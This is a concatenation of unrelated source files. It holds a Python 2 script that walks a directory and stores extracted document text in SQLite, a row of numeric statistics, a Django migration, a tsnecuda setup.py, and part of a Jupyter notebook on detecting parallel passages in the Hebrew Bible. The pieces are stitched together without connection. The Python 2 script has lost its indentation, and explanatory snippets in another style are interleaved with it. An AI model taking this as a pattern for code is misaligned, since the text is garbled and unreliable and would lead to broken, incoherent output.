myTXTpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\AllTestFiles\TXT\normal.txt'
#myTXTpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\AllTestFiles\TXT\unicode.txt'
#myTXTpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\AllTestFiles\TXT\unicode_big.txt'
#myTXTpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\AllTestFiles\TXT\unicode_utf8.txt'
#myTXTpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\AllTestFiles\TXT\x.txt'
#myPDFpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\AllTestFiles\PDF\test.pdf'
#myPDFpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\AllTestFiles\PDF\xtest.pdf'
myPDFpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\AllTestFiles\PDF\ztest.pdf'
myDOCpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\AllTestFiles\DOC\xtest.doc'
myDOCXpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\AllTestFiles\DOC\xtest.docx'
mydirpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\AllTestFiles'
#mydirpath=r'c:\LENBAL\Trainings\Securitytube_Python_Expert_PRIVATE\My_Network_Discovery_Project\Main_Program\DataGathered'
#mypath=myTXTpath
#mypath=myXLSpath
#mypath=myPDFpath
#mypath=myDOCpath
#mypath=myDOCXpath
#PROGRAM START
def process_myfile(thepath,verbosity=0):
#Select file type
fileextension=""
result=()
if '.' in thepath:
fileextension = thepath.rsplit('.', 1)[1]
if fileextension in DOC_filetypes:
doc_match=doc_full_search_tuple(thepath,myverbosity)
if doc_match:
result+=(doc_match,'doc')
if verbosity>1:
print doc_match
elif fileextension in DOCX_filetypes:
docx_match=docx_full_search_tuple(thepath,myverbosity)
if docx_match:
result+=(docx_match,'docx')
if verbosity>1:
print docx_match
elif fileextension in XLS_filetypes:
#PROCESS XLS
#xls_match=xls_full_search_tuple(thepath,verbosity=myverbosity)
xls_match=xls_full_search_tuple(thepath,myverbosity)
if xls_match:
result+=(xls_match,'xlsx')
if verbosity>1:
print xls_match
#print xls_match[-1]
elif fileextension in PDF_filetypes:
pdf_match=pdf_full_search_tuple(thepath,myverbosity)
if pdf_match:
result+=(pdf_match,'pdf')
if verbosity>1:
print pdf_match
#print pdf_match[-1]
elif fileextension in TXT_filetypes:
#PROCESS TXT
#txt_match=txt_full_search_tuple(thepath,maxencode=mymaxencode,verbosity=myverbosity)
txt_match=txt_full_search_tuple(thepath,mymaxencode,myverbosity)
if txt_match:
result+=(txt_match,'txt')
if verbosity>1:
print txt_match
#print txt_match[-1]
else:
print "[-] UNKNOWN filetype",thepath
return result
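`process_myfile` dispatches on the extension extracted with `rsplit('.', 1)`; the same extraction in isolation:

```python
def file_extension(path):
    # Everything after the last dot, or '' when the name has no dot,
    # mirroring the fileextension logic above.
    return path.rsplit('.', 1)[1] if '.' in path else ''


print(file_extension('report.final.docx'))  # docx
print(file_extension('README'))             # (empty string)
```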
def process_localdir(localdir, recursive=0):
    results = ()
    if recursive == 0:
        #files = [ f for f in os.listdir(localdir) if os.path.isfile(os.path.join(localdir,f)) ]
        for files in os.listdir(localdir):
            if os.path.isfile(os.path.join(localdir, files)):
                abspath = os.path.join(localdir, files)
                abspath = os.path.normpath(abspath).replace('//', '/')
                #print abspath
                results += (abspath,)
    else:
        for subdir, dirs, files in os.walk(localdir):
            for file in files:
                abspath = os.path.join(subdir, file)
                abspath = os.path.normpath(abspath).replace('//', '/')
                #print abspath
                results += (abspath,)
    return results
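`process_localdir` is a flat-versus-recursive directory listing; a Python 3 re-statement of the same idea, exercised against a throwaway temp directory:

```python
import os
import tempfile


def list_files(root, recursive=False):
    # Flat: one listdir pass keeping only regular files.
    # Recursive: a full os.walk. Paths are normalised either way.
    if not recursive:
        return tuple(
            os.path.normpath(os.path.join(root, f))
            for f in os.listdir(root)
            if os.path.isfile(os.path.join(root, f)))
    found = ()
    for subdir, _dirs, files in os.walk(root):
        for f in files:
            found += (os.path.normpath(os.path.join(subdir, f)),)
    return found


with tempfile.TemporaryDirectory() as d:
    open(os.path.join(d, 'a.txt'), 'w').close()
    os.mkdir(os.path.join(d, 'sub'))
    open(os.path.join(d, 'sub', 'b.txt'), 'w').close()
    print(len(list_files(d)), len(list_files(d, recursive=True)))  # 1 2
```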
#print "##########################Main Program Started##########################"
#ANALYSE A SPECIFIC FILE
#process_myfile(mypath)
#ANALYSE ALL FILES IN A SPECIFIED DIRECTORY
filesindir=process_localdir(mydirpath,1)
Analysisconn, Analysisc = db_connect(Analysis_sqlite_file)
create_host_db(Analysisconn, Analysis_create_script,print_out=False)
filecount=len(filesindir)
filecounter=1
if filecount == 0:
    print "No files to analyse"
for fn in range(len(filesindir)):
    mytext = process_myfile(filesindir[fn])
    print "Analysing file %d/%d %s" % (filecounter, filecount, filesindir[fn])
    filecounter += 1
    if mytext:
        ftype = mytext[1]
        mytextdata = mytext[0]
        insert_analysis_data(Analysisc, Analysis_table_name, mytextdata, ftype, print_out=False)
        db_commit(Analysisconn)
db_commit(Analysisconn)
db_close(Analysisconn)
print (raw_input('Press Enter to Exit!')) | 36.891304 | 144 | 0.792772 | 698 | 5,091 | 5.537249 | 0.216332 | 0.039845 | 0.026908 | 0.05718 | 0.513842 | 0.495213 | 0.464683 | 0.43053 | 0.421475 | 0.421475 | 0 | 0.004935 | 0.084463 | 5,091 | 138 | 145 | 36.891304 | 0.824287 | 0.316637 | 0 | 0.141304 | 0 | 0 | 0.25737 | 0.214033 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.01087 | 0.021739 | null | null | 0.119565 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
# Generated by Django 3.1.4 on 2020-12-27 15:03
from django.db import migrations, models


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Product',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255)),
                ('short_description', models.TextField(max_length=255)),
                ('long_description', models.TextField()),
                ('image', models.ImageField(blank=True, null=True, upload_to='product_pictures/%Y/%m')),
                ('slug', models.SlugField(unique=True)),
                ('price_marketing', models.FloatField()),
                ('price_marketing_promotion', models.FloatField(default=0)),
                ('FIELDNAME', models.CharField(choices=[('V', 'Variação'), ('S', 'Simples')], default='V', max_length=1)),
            ],
        ),
    ]
from setuptools import setup
setup(
    name='tsnecuda',
    version='2.1.0',
    author='Chan, David M., Huang, Forrest., Rao, Roshan.',
    author_email='davidchan@berkeley.edu',
    packages=['tsnecuda', 'tsnecuda.test'],
    package_data={'tsnecuda': ['libtsnecuda.so']},
    scripts=[],
    url='https://github.com/CannyLab/tsne-cuda',
    license='LICENSE.txt',
    description='CUDA Implementation of T-SNE with Python bindings',
    long_description=open('README.txt').read(),
    install_requires=[
        'numpy >= 1.14.1',
    ],
    classifiers=[
        'Programming Language :: Python :: 3.6',
        'Operating System :: POSIX :: Linux',
        'Intended Audience :: Developers',
        'Intended Audience :: Science/Research',
        'Topic :: Scientific/Engineering :: Artificial Intelligence',
    ],
    keywords=[
        'TSNE',
        'CUDA',
        'Machine Learning',
        'AI',
    ],
)
#!/usr/bin/env python
# coding: utf-8
# <img align="right" src="images/dans-small.png"/>
# <img align="right" src="images/tf-small.png"/>
# <img align="right" src="images/etcbc.png"/>
#
#
# # Parallel Passages in the MT
#
# # 0. Introduction
#
# ## 0.1 Motivation
# We want to make a list of **all** parallel passages in the Masoretic Text (MT) of the Hebrew Bible.
#
# Here is a quote that triggered Dirk to write this notebook:
#
# > Finally, the Old Testament Parallels module in Accordance is a helpful resource that enables the researcher to examine 435 sets of parallel texts, or in some cases very similar wording in different texts, in both the MT and translation, but the large number of sets of texts in this database should not fool one to think it is complete or even nearly complete for all parallel writings in the Hebrew Bible.
#
# Robert Rezetko and Ian Young.
# Historical linguistics & Biblical Hebrew. Steps Toward an Integrated Approach.
# *Ancient Near East Monographs, Number9*. SBL Press Atlanta. 2014.
# [PDF Open access available](https://www.google.nl/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CCgQFjAB&url=http%3A%2F%2Fwww.sbl-site.org%2Fassets%2Fpdfs%2Fpubs%2F9781628370461_OA.pdf&ei=2QSdVf-vAYSGzAPArJeYCg&usg=AFQjCNFA3TymYlsebQ0MwXq2FmJCSHNUtg&sig2=LaXuAC5k3V7fSXC6ZVx05w&bvm=bv.96952980,d.bGQ)
# <img align="right" width="50%" src="parallel.png"/>
#
# ## 0.3 Open Source
# This is an IPython notebook.
# It contains a working program to carry out the computations needed to obtain the results reported here.
#
# You can download this notebook and run it on your computer, provided you have
# [Text-Fabric](https://github.com/Dans-labs/text-fabric) installed.
#
# It is a pity that we cannot compare our results with the Accordance resource mentioned above,
# since that resource has not been published in an accessible manner.
# We also do not have the information how this resource has been constructed on the basis of the raw data.
# In contrast with that, we present our results in a completely reproducible manner.
# This notebook itself can serve as the method of replication,
# provided you have obtained the necessary resources.
# See [sources](https://github.com/ETCBC/shebanq/wiki/Sources), which are all Open Access.
#
# ## 0.4 What are parallel passages?
# The notion of *parallel passage* is not a simple, straightforward one.
# There are parallels on the basis of lexical content in the passages on the one hand,
# but on the other hand there are also correspondences in certain syntactical structures,
# or even in similarities in text structure.
#
# In this notebook we do select a straightforward notion of parallel, based on lexical content only.
# We investigate two measures of similarity, one that ignores word order completely,
# and one that takes word order into account.
#
# Two kinds of short-comings of this approach must be mentioned:
#
# 1. We will not find parallels based on non-lexical criteria (unless they are also lexical parallels)
# 1. We will find too many parallels: certain short sentences (*and he said*) or formula-like passages (*and the word of God came to Moses*) occur so often that their presence has only a subtle bearing on whether there is a common text history.
#
# For a more full treatment of parallel passages, see
#
# **Wido Th. van Peursen and Eep Talstra**:
# Computer-Assisted Analysis of Parallel Texts in the Bible -
# The Case of 2 Kings xviii-xix and its Parallels in Isaiah and Chronicles.
# *Vetus Testamentum* 57, pp. 45-72.
# 2007, Brill, Leiden.
#
# Note that our method fails to identify any parallels with Chronica_II 32.
# Van Peursen and Talstra state about this chapter and 2 Kings 18:
#
# > These chapters differ so much, that it is sometimes impossible to establish
# which verses should be considered parallel.
#
# In this notebook we produce a set of *cliques*,
# a clique being a set of passages that are *quite* similar, based on lexical information.
#
#
# ## 0.5 Authors
# This notebook is by Dirk Roorda and owes a lot to discussions with Martijn Naaijer.
#
# [Dirk Roorda](mailto:dirk.roorda@dans.knaw.nl) while discussing ideas with
# [Martijn Naaijer](mailto:m.naaijer@vu.nl).
#
#
# ## 0.6 Status
#
# * **modified: 2017-09-28** Is now part of a pipeline for transferring data from the ETCBC to Text-Fabric.
# * **modified: 2016-03-03** Added experiments based on chapter chunks and lower similarities.
#
# 165 experiments have been carried out, of which 18 yielded promising results.
# All results can be easily inspected, just by clicking in your browser.
# One of the experiments has been chosen as the basis for
# [crossref](https://shebanq.ancient-data.org/hebrew/note?version=4b&id=Mnxjcm9zc3JlZg__&tp=txt_tb1&nget=v)
# annotations in SHEBANQ.
#
# # 1. Results
#
# Click in a green cell to see interesting results. The numbers in the cell indicate
#
# * the number of passages that have a variant elsewhere
# * the number of *cliques* they form (cliques are sets of similar passages)
# * the number of passages in the biggest clique
#
# Below the results is an account of the method that we used, followed by the actual code to produce these results.
# # Pipeline
# See [operation](https://github.com/ETCBC/pipeline/blob/master/README.md#operation)
# for how to run this script in the pipeline.
#
# The pipeline comes in action in Section [6a](#6a) below: TF features.
# # Caveat
#
# This notebook makes use of a new feature of text-fabric, first present in 2.3.15.
# Make sure to upgrade first.
#
# ```
# sudo -H pip3 install --upgrade text-fabric
# ```
# In[1]:
import sys
import os
import re
import collections
import pickle
import math
import difflib
import yaml
from difflib import SequenceMatcher
from IPython.display import HTML
import matplotlib.pyplot as plt
from tf.core.helpers import formatMeta
# pip3 install python-Levenshtein
# In[2]:
from Levenshtein import ratio
# In[3]:
import utils
from tf.fabric import Fabric
# In[4]:
get_ipython().run_line_magic("load_ext", "autoreload") # noqa F821
get_ipython().run_line_magic("autoreload", "2") # noqa F821
get_ipython().run_line_magic("matplotlib", "inline") # noqa F821
# In[5]:
if "SCRIPT" not in locals():
    SCRIPT = False
    FORCE = True
    FORCE_MATRIX = False
    LANG_FEATURE = "languageISO"
    OCC_FEATURE = "g_cons"
    LEX_FEATURE = "lex"
    TEXT_FEATURE = "g_word_utf8"
    TRAILER_FEATURE = "trailer_utf8"
    CORE_NAME = "bhsa"
    NAME = "parallels"
    VERSION = "2021"
# In[6]:
def stop(good=False):
    if SCRIPT:
        sys.exit(0 if good else 1)
# In[7]:
# run this cell after all other cells
if False and not SCRIPT:
    HTML(other_exps)
# # 2. Experiments
#
# We have conducted 165 experiments, all corresponding to a specific choice of parameters.
# Every experiment is an attempt to identify variants and collect them in *cliques*.
#
# The table gives an overview of the experiments conducted.
#
# Every *row* corresponds to a particular way of chunking and a method of measuring the similarity.
#
# There are *columns* for each similarity *threshold* that we have tried.
# The idea is that chunks are similar if their similarity is above the threshold.
#
# The outcomes of one experiment have been added to SHEBANQ as the note set
# [crossref](https://shebanq.ancient-data.org/hebrew/note?version=4b&id=Mnxjcm9zc3JlZg__&tp=txt_tb1&nget=v).
# The experiment chosen for this is currently
#
# * *chunking*: **object verse**
# * *similarity method*: **SET**
# * *similarity threshold*: **65**
#
#
# ## 2.1 Assessing the outcomes
#
# Not all experiments lead to useful results.
# We have indicated the value of a result by a color coding, based on objective characteristics,
# such as the number of parallel passages, the number of cliques, the size of the greatest clique, and the way of chunking.
# These numbers are shown in the cells.
#
# ### 2.1.1 Assessment criteria
#
# If the method is based on *fixed* chunks, we deprecate the method and its results,
# because two perfectly similar verses can be missed when a 100-word-wide window that shifts over the text aligns differently with each of them, which will usually be the case.
#
# Otherwise, we consider the *ll*, the length of the longest clique, and *nc*, the number of cliques.
# We set three quality parameters:
# * `REC_CLIQUE_RATIO` = 5 : recommended clique ratio
# * `DUB_CLIQUE_RATIO` = 15 : dubious clique ratio
# * `DEP_CLIQUE_RATIO` = 25 : deprecated clique ratio
#
# where the *clique ratio* is $100 (ll/nc)$,
# i.e. the length of the longest clique divided by the number of cliques as percentage.
#
# An experiment is *recommended* if its clique ratio is between the recommended and dubious clique ratios.
#
# It is *dubious* if its clique ratio is between the dubious and deprecated clique ratios.
#
# It is *deprecated* if its clique ratio is above the deprecated clique ratio.
#
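# As a sketch, the rule reads as follows (hypothetical function name; the case below the
# recommended bound is not spelled out above and is mapped to "unassessed" here by assumption):

```python
DEP_CLIQUE_RATIO = 25
DUB_CLIQUE_RATIO = 15
REC_CLIQUE_RATIO = 5


def assess(longest_clique, n_cliques):
    """Classify an experiment by its clique ratio 100 * (ll / nc)."""
    ratio = 100 * longest_clique / n_cliques
    if ratio >= DEP_CLIQUE_RATIO:
        return "dep"  # deprecated
    if ratio >= DUB_CLIQUE_RATIO:
        return "dub"  # dubious
    if ratio >= REC_CLIQUE_RATIO:
        return "rec"  # recommended
    return "nor"  # below the recommended bound: unassessed (assumption)
```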
# # 2.2 Inspecting results
# If you click on the hyperlink in the cell, you are taken to a page that gives you
# all the details of the results:
#
# 1. A link to a file with all *cliques* (which are the sets of similar passages)
# 1. A list of links to chapter-by-chapter diff files (for cliques with just two members), and only for
# experiments with outcomes that are labeled as *promising* or *unassessed quality* or *mixed results*.
#
# To get into the variants quickly, inspect the list (2) and click through
# to see the actual variant material in chapter context.
#
# Not all variants occur here, so continue with (1) to see the remaining cliques.
#
# Sometimes in (2) a chapter diff file does not indicate clearly the relevant common part of both chapters.
# In that case you have to consult the big list (1)
#
# All these results can be downloaded from the
# [SHEBANQ github repo](https://github.com/ETCBC/shebanq/tree/master/static/docs/tools/parallel/files)
# After downloading the whole directory, open ``experiments.html`` in your browser.
# # 3. Method
#
# Here we discuss the method we used to arrive at a list of parallel passages
# in the Masoretic Text (MT) of the Hebrew Bible.
#
# ## 3.1 Similarity
#
# We have to find passages in the MT that are *similar*.
# Therefore we *chunk* the text in some way, and then compute the similarities between pairs of chunks.
#
# There are many ways to define and compute similarity between texts.
# Here, we have tried two methods ``SET`` and ``LCS``.
# Both methods define similarity as the fraction of common material with respect to the total material.
#
# ### 3.1.1 SET
#
# The ``SET`` method reduces textual chunks to *sets* of *lexemes*.
# This method abstracts from the order and number of occurrences of words in chunks.
#
# We use as measure for the similarity of chunks $C_1$ and $C_2$ (taken as sets):
#
# $$ s_{\rm set}(C_1, C_2) = {\vert C_1 \cap C_2\vert \over \vert C_1 \cup C_2 \vert} $$
#
# where $\vert X \vert$ is the number of elements in set $X$.
#
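# As a minimal sketch (hypothetical helper name, not part of the pipeline code below),
# the ``SET`` measure is the Jaccard index of the two chunks taken as lexeme sets:

```python
def sim_set(c1, c2):
    """SET similarity: |C1 & C2| / |C1 | C2| for chunks taken as sets of lexemes."""
    c1, c2 = set(c1), set(c2)
    if not c1 and not c2:
        return 0.0  # convention for two empty chunks
    return len(c1 & c2) / len(c1 | c2)
```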
# ### 3.1.2 LCS
#
# The ``LCS`` method is less reductive: chunks are *strings* of *lexemes*,
# so the order and number of occurrences of words is retained.
#
# We use as measure for the similarity of chunks $C_1$ and $C_2$ (taken as strings):
#
# $$ s_{\rm lcs}(C_1, C_2) = {\vert {\rm LCS}(C_1,C_2)\vert \over \vert C_1\vert + \vert C_2 \vert -
# \vert {\rm LCS}(C_1,C_2)\vert} $$
#
# where ${\rm LCS}(C_1, C_2)$ is the
# [longest common subsequence](https://en.wikipedia.org/wiki/Longest_common_subsequence_problem)
# of $C_1$ and $C_2$ and
# $\vert X\vert$ is the length of sequence $X$.
#
# It remains to be seen whether we need the extra sophistication of ``LCS``.
# The risk is that ``LCS`` could fail to spot related passages when there is a large amount of transposition going on.
# The results should have the last word.
#
# We need to compute the LCS efficiently, and for this we used the python ``Levenshtein`` module:
#
# ``pip install python-Levenshtein``
#
# whose documentation is
# [here](http://www.coli.uni-saarland.de/courses/LT1/2011/slides/Python-Levenshtein.html).
#
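# For reference, a plain dynamic-programming sketch of this measure (hypothetical names;
# the actual computation in this notebook relies on the much faster ``Levenshtein.ratio``):

```python
def lcs_len(a, b):
    """Length of the longest common subsequence of sequences a and b (O(len(a)*len(b)) DP)."""
    prev = [0] * (len(b) + 1)
    for x in a:
        cur = [0]
        for j, y in enumerate(b):
            # extend the diagonal on a match, else take the best neighbour
            cur.append(prev[j] + 1 if x == y else max(prev[j + 1], cur[j]))
        prev = cur
    return prev[-1]


def sim_lcs(c1, c2):
    """LCS similarity: |LCS| / (|C1| + |C2| - |LCS|)."""
    lcs = lcs_len(c1, c2)
    denom = len(c1) + len(c2) - lcs
    return lcs / denom if denom else 0.0
```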
# ## 3.2 Performance
#
# Similarity computation is the part where the heavy lifting occurs.
# It is basically quadratic in the number of chunks, so if you have verses as chunks (~ 23,000),
# you need to do ~ 270,000,000 similarity computations, and if you use sentences (~ 64,000),
# you need to do ~ 2,000,000,000 ones!
# The computation of a single similarity should be *really* fast.
#
# Besides that, we use two ways to economize:
#
# * after having computed a matrix for a specific set of parameter values, we save the matrix to disk;
# new runs can load the matrix from disk in a matter of seconds;
# * we do not store low similarity values in the matrix, low being < ``MATRIX_THRESHOLD``.
#
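# The two economies can be sketched together as follows (hypothetical helper; the real
# matrix code lives further down in this notebook):

```python
import os
import pickle


def cached_matrix(path, compute, threshold=50):
    """Load a similarity matrix from disk if present; otherwise compute it,
    drop all entries below `threshold`, and save it for later runs."""
    if os.path.exists(path):
        with open(path, "rb") as f:
            return pickle.load(f)
    matrix = {pair: sim for pair, sim in compute().items() if sim >= threshold}
    with open(path, "wb") as f:
        pickle.dump(matrix, f, protocol=3)
    return matrix
```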
# The ``LCS`` method is more complicated.
# We have tried the ``ratio`` method from the ``difflib`` package that is present in the standard python distribution.
# This is unbearably slow for our purposes.
# The ``ratio`` method in the ``Levenshtein`` package is much quicker.
#
# See the table for an indication of the amount of work to create the similarity matrix
# and the performance per similarity method.
#
# The *matrix threshold* is the lower bound of similarities that are stored in the matrix.
# If a pair of chunks has a lower similarity, no entry will be made in the matrix.
#
# The computing has been done on a Macbook Air (11", mid 2012, 1.7 GHz Intel Core i5, 8GB RAM).
#
# |chunk type |chunk size|similarity method|matrix threshold|# of comparisons|size of matrix (KB)|computing time (min)|
# |:----------|---------:|----------------:|---------------:|---------------:|------------------:|-------------------:|
# |fixed |100 |LCS |60 | 9,003,646| 7| ? |
# |fixed |100 |SET |50 | 9,003,646| 7| ? |
# |fixed |50 |LCS |60 | 36,197,286| 37| ? |
# |fixed |50 |SET |50 | 36,197,286| 18| ? |
# |fixed |20 |LCS |60 | 227,068,705| 2,400| ? |
# |fixed |20 |SET |50 | 227,068,705| 113| ? |
# |fixed |10 |LCS |60 | 909,020,841| 59,000| ? |
# |fixed |10 |SET |50 | 909,020,841| 1,800| ? |
# |object |verse |LCS |60 | 269,410,078| 2,300| 31|
# |object |verse |SET |50 | 269,410,078| 509| 14|
# |object |half_verse|LCS |60 | 1,016,396,241| 40,000| 50|
# |object |half_verse|SET |50 | 1,016,396,241| 3,600| 41|
# |object |sentence |LCS |60 | 2,055,975,750| 212,000| 68|
# |object |sentence |SET |50 | 2,055,975,750| 82,000| 63|
# # 4. Workflow
#
# ## 4.1 Chunking
#
# There are several ways to chunk the text:
#
# * fixed chunks of approximately ``CHUNK_SIZE`` words
# * by object, such as verse, sentence and even chapter
#
# After chunking, we prepare the chunks for similarity measuring.
#
# ### 4.1.1 Fixed chunking
# Fixed chunking is unnatural, but if the chunk size is small, it can yield fair results.
# The results are somewhat difficult to inspect, because they generally do not respect constituent boundaries.
# It is to be expected that fixed chunks in variant passages will be mutually *out of phase*,
# meaning that the chunks involved in these passages are not aligned with each other.
# So they will have a lower similarity than they could have if they were aligned.
# This is a source of artificial noise in the outcome and/or missed cases.
#
# If the chunking respects "natural" boundaries in the text, there is far less misalignment.
#
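# A fixed chunker is just a consecutive partition of the word list (sketch, hypothetical name):

```python
def fixed_chunks(words, size):
    """Cut a flat list of words into consecutive chunks of at most `size` words."""
    return [words[i:i + size] for i in range(0, len(words), size)]
```

# Two identical verses that start at different offsets within their windows end up in
# differently aligned chunks, which is exactly the out-of-phase problem described above.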
# ### 4.1.2 Object chunking
# We can also chunk by object, such as verse, half_verse or sentence.
#
# Chunking by *verse* is very much like chunking in fixed chunks of size 20, performance-wise.
#
# Chunking by *half_verse* is comparable to fixed chunks of size 10.
#
# Chunking by *sentence* will generate an enormous amount of
# false positives, because there are very many very short sentences (down to 1-word) in the text.
# Besides that, the performance overhead is huge.
#
# The *half_verses* seem to be very interesting candidates.
# They are smaller than verses, but there are fewer *degenerate cases* than with sentences.
# From the table above it can be read that half verses require only half as many similarity computations as sentences.
#
#
# ## 4.2 Preparing
#
# We prepare the chunks for the application of the chosen method of similarity computation (``SET`` or ``LCS``).
#
# In both cases we reduce the text to a sequence of transliterated consonantal *lexemes* without disambiguation.
# In fact, we go one step further: we remove the consonants (aleph, wav, yod) that are often silent.
#
# For ``SET``, we represent each chunk as the set of its reduced lexemes.
#
# For ``LCS``, we represent each chunk as the string obtained by joining its reduced lexemes separated by white spaces.
#
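# A sketch of this preparation step (hypothetical names; the regular expression is the
# one defined below, where `=`, `/` and `[` are ETCBC lexeme disambiguation marks):

```python
import re

EXCLUDED_PAT = re.compile(r"[>WJ=/\[]")  # aleph, wav, yod + disambiguation marks


def reduce_lex(lexeme):
    """Strip often-silent consonants and disambiguation marks from a transliterated lexeme."""
    return EXCLUDED_PAT.sub("", lexeme)


def prepare_set(lexemes):
    """SET method: a chunk becomes the set of its reduced lexemes."""
    return {reduce_lex(lx) for lx in lexemes}


def prepare_lcs(lexemes):
    """LCS method: a chunk becomes the space-joined string of its reduced lexemes."""
    return " ".join(reduce_lex(lx) for lx in lexemes)
```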
# ## 4.3 Cliques
#
# After having computed a sufficient part of the similarity matrix, we set a value for ``SIMILARITY_THRESHOLD``.
# All pairs of chunks having at least that similarity are deemed *interesting*.
#
# We organize the members of such pairs in *cliques*, groups of chunks of which each member is
# similar (*similarity* > ``SIMILARITY_THRESHOLD``) to at least one other member.
#
# We start with no cliques and walk through the pairs whose similarity is above ``SIMILARITY_THRESHOLD``,
# and try to put each member into a clique.
#
# If there is not yet a clique, we make the member in question into a new singleton clique.
#
# If there are cliques, we find the cliques that have a member similar to the member in question.
# If we find several, we merge them all into one clique.
#
# If there is no such clique, we put the member in a new singleton clique.
#
# NB: Cliques may *drift*, meaning that they contain members that are completely different from each other.
# They are in the same clique, because there is a path of pairwise similar members leading from the one chunk to the other.
#
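# The clique-growing walk described above can be sketched as follows (hypothetical names;
# the production version below works on chunk identifiers and the similarity matrix):

```python
def grow_cliques(pairs, is_similar):
    """Collect chunks from similar pairs into cliques: each chunk joins
    (and, if necessary, merges) all cliques that contain a similar member."""
    cliques = []
    for pair in pairs:
        for chunk in pair:
            hits = [c for c in cliques if any(is_similar(chunk, m) for m in c)]
            if hits:
                merged = set().union(*hits) | {chunk}
                cliques = [c for c in cliques if c not in hits]
                cliques.append(merged)
            else:
                cliques.append({chunk})
    return cliques
```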
# ### 4.3.1 Organizing the cliques
# In order to handle cases where there are many corresponding verses in corresponding chapters, we produce
# chapter-by-chapter diffs in the following way.
#
# We make a list of all chapters that are involved in cliques.
# This yields a list of chapter cliques.
# For all *binary* chapters cliques, we generate a colorful diff rendering (as HTML) for the complete two chapters.
#
# We only do this for *promising* experiments.
#
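# The colorful two-chapter diff rendering can be done with the standard library
# (sketch; file naming and chapter extraction are handled elsewhere in this notebook):

```python
import difflib


def chapter_diff(lines_a, lines_b, label_a="chapter A", label_b="chapter B"):
    """Render a side-by-side HTML diff of two chapters, given as lists of verse texts."""
    return difflib.HtmlDiff(wrapcolumn=80).make_file(lines_a, lines_b, label_a, label_b)
```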
# ### 4.3.2 Evaluating clique sets
#
# Not all clique sets are equally worth while.
# For example, if we set the ``SIMILARITY_THRESHOLD`` too low, we might get one gigantic clique, especially
# in combination with a fine-grained chunking. In other words: we suffer from *clique drifting*.
#
# We detect clique drifting by looking at the size of the largest clique.
# If that is large compared to the total number of chunks, we deem the results unsatisfactory.
#
# On the other hand, when the ``SIMILARITY_THRESHOLD`` is too high, you might miss a lot of correspondences,
# especially when chunks are large, or when we have fixed-size chunks that are out of phase.
#
# We deem the results of experiments based on a partitioning into fixed length chunks as unsatisfactory, although it
# might be interesting to inspect what exactly the damage is.
#
# At the moment, we have not yet analyzed the relative merits of the similarity methods ``SET`` and ``LCS``.
# # 5. Implementation
#
#
# The rest is code. From here we fire up the engines and start computing.
# In[8]:
PICKLE_PROTOCOL = 3
# # Setting up the context: source file and target directories
#
# The conversion is executed in an environment of directories, so that sources, temp files and
# results are in convenient places and do not have to be shifted around.
# In[9]:
repoBase = os.path.expanduser("~/github/etcbc")
coreRepo = "{}/{}".format(repoBase, CORE_NAME)
thisRepo = "{}/{}".format(repoBase, NAME)
# In[10]:
coreTf = "{}/tf/{}".format(coreRepo, VERSION)
# In[11]:
allTemp = "{}/_temp".format(thisRepo)
thisTemp = "{}/_temp/{}".format(thisRepo, VERSION)
thisTempTf = "{}/tf".format(thisTemp)
# In[12]:
thisTf = "{}/tf/{}".format(thisRepo, VERSION)
thisNotes = "{}/shebanq/{}".format(thisRepo, VERSION)
# In[13]:
notesFile = "crossrefNotes.csv"
if not os.path.exists(thisNotes):
    os.makedirs(thisNotes)
# # Test
#
# Check whether this conversion is needed in the first place.
# Only when run as a script.
# In[14]:
if SCRIPT:
    (good, work) = utils.mustRun(
        None, "{}/.tf/{}.tfx".format(thisTf, "crossref"), force=FORCE
    )
    if not good:
        stop(good=False)
    if not work:
        stop(good=True)
# ## 5.1 Loading the feature data
#
# We load the features we need from the BHSA core database.
# In[15]:
utils.caption(4, "Load the existing TF dataset")
TF = Fabric(locations=coreTf, modules=[""])
# In[16]:
api = TF.load(
    """
    otype
    {} {} {}
    book chapter verse number
""".format(
        LEX_FEATURE,
        TEXT_FEATURE,
        TRAILER_FEATURE,
    )
)
api.makeAvailableIn(globals())
# ## 5.2 Configuration
#
# Here are the parameters on which the results crucially depend.
#
# There are also parameters that control the reporting of the results, such as file locations.
# In[17]:
# chunking
CHUNK_LABELS = {True: "fixed", False: "object"}
CHUNK_LBS = {True: "F", False: "O"}
CHUNK_SIZES = (100, 50, 20, 10)
CHUNK_OBJECTS = ("chapter", "verse", "half_verse", "sentence")
# In[18]:
# preparing
EXCLUDED_CONS = r"[>WJ=/\[]" # weed out weak consonants
EXCLUDED_PAT = re.compile(EXCLUDED_CONS)
# In[19]:
# similarity
MATRIX_THRESHOLD = 50
SIM_METHODS = ("SET", "LCS")
SIMILARITIES = (100, 95, 90, 85, 80, 75, 70, 65, 60, 55, 50, 45, 40, 35, 30)
# In[20]:
# printing
DEP_CLIQUE_RATIO = 25
